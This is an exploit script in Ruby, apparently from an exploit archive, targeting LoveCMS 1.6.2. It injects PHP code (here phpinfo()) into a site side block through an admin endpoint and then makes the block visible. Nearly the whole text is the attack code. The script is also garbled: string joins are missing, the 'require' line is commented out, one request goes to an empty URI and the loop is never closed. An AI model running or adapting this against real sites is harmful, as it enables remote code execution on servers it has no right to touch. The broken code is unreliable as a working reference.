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LoveCMS 1.6.2 Final Remote Code Execution Exploit



## Exploit by PoMdaPiMp!

## ---------------------

## pomdapimp(at)gmail(dotcom)


## LoveCMS Exploit Series

## Episode 1: adding a side block


## Description: add some php into a block container

## on the side of the site. phpinfo() is called.


## Usage: ./LoveCMS_1_blocks.rb <host>

## Ex: ./LoveCMS_2_themes.rb


## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)

# require 'net/http'

require 'uri' @host = '' @host = ARGV[0] if ARGV[0]

@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host

# --

puts " LoveCMS Exploit Series. #1: Adding side blocks."


puts " : Attacking host: " @host # --

# Insert a new block

res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),

{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})

puts " :: Block inserted." # --

# Build post variable for next step

post_vars = {'submit' => 1}

(1..50).each do |id|

post_vars['position' id.to_s] = 1

post_vars['height' id.to_s] = 1

post_vars['visible' id.to_s] = 1


# Make the block visible

res = Net::HTTP.post_form(URI.parse(''), post_vars )

puts " :: Blocks displayed." # --


puts " - Visit " @host


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